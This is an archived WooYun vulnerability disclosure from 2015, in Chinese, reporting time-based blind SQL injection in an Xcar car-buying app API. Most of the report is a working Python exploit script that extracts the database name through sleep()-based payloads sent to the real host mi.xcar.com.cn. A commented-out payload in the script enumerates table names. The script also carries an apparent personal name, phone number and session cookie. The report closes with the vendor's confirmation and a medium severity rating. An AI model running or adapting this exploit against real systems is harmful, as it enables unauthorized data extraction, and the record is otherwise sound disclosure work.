乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-30: 细节已通知厂商并且等待厂商处理中 2015-10-30: 厂商已经确认,细节仅向厂商公开 2015-11-09: 细节向核心白帽子及相关领域专家公开 2015-11-19: 细节向普通白帽子公开 2015-11-29: 细节向实习白帽子公开 2015-12-14: 细节向公众公开
爱卡汽车APP之SQL注入,发现是另一台数据库服务器了,新的几个库~~
目标:爱卡汽车官网APP爱买车检测发现以下地方存在SQL注入:(注入参数一:deviceId,时间盲注注入参数二:rollNumbers,时间盲注)
http://mi.xcar.com.cn/interface/gcpapp/lottoryQuery.php?cityId=475&deviceId=A0000038000000&deviceType=0&rollNumbers=-1
因为有过滤,写了个Python:(以database()为例,程序中含代理,测试时请去除)另外,发现跟之前的数据库服务器不一样了哦~明显是另一台~~
#!/usr/bin/env python#coding=utf8import httplib, urllib, re, timedatabase = ''temp_database = ''httpClient = Nonecount = 0i = 33while i < 128: if i == 37: i = i+1 try: #params = 'appName=1&carId=23113&channelId=126&cityId=484&description=%E5%A5%BD%E7%9A%84&desireId=22&desires=%E7%99%BD%E5%A4%96%E9%BB%91%E5%86%85%2C%E7%8E%B0%E8%BD%A6%2C%E4%BC%98%E6%83%A05000%2C%E9%80%89%E8%A3%85%E6%B0%99%E7%81%AF&deviceId=A0000038518D0C&&deviceType=2&did_all=(select(0)from(select(case when ((select GROUP_CONCAT(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x474f434152) like 0x'+temp_database+str(hex(i))[2:]+'25) then sleep(3) else sleep(0) end))v)&encryptedTelephone=03ce7ab07859e52a030105e0c48bfa98&name=陈静&provinceId=3&quickDesire=0&telephone=13525698541&uid=9706075&ver=3.1' headers = {"Host": "mi.xcar.com.cn", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0", "Accept-Encoding": "gzip,deflate", "Accept": "*/*", "Cookie": "iphonecookie=d986Lj6fkWsE3MM/QdTmjPQhCAaTgrGFPrkjbvnp4STEMwWqMXd5RxvN15ksoTHy4HV3NZPP7B7v3ReafyKA4adBwBBq6IBA5lab2fFAKWvzKgV9KxBlIeGjc0Oz20/JKQ;", "Connection": "keep-alive"} #"Content-Type": "application/x-www-form-urlencoded", #"Content-Length": len(params)} httpClient = httplib.HTTPConnection("192.168.1.2", 8080, timeout=30) url = 'http://mi.xcar.com.cn/interface/gcpapp/lottoryQuery.php?cityId=475&deviceId=A0000038000000\'%20and%20(select(0)from(select(case%20when%20(database()%20like%200x'+temp_database+str(hex(i))[2:]+'25)%20then%20sleep(3)%20else%20sleep(0)%20end))v)%20--%20-%20&deviceType=0&rollNumbers=-1' httpClient.request("GET", url=url, headers=headers) st = time.time() response = httpClient.getresponse() rp = response.read() if count == 1: if time.time()-st > 3: temp_database = temp_database + str(hex(i))[2:] database = database + chr(i) print 'Tables: ', database i = 33 count = 0 else: count = 0 elif time.time()-st > 3: count = 1 i = i-1 i=i+1 except Exception, e: print e finally: if httpClient: httpClient.close()
1、SQLMap漏洞证明
2、当前数据库用户
3、共4个库,当前库为push
4、不妨跨库看看app_kc库的前三个表
请多指教~
危害等级:中
漏洞Rank:8
确认时间:2015-10-30 11:19
感谢 @路人甲 的提交,问题已经确认,我们会尽快修复!
暂无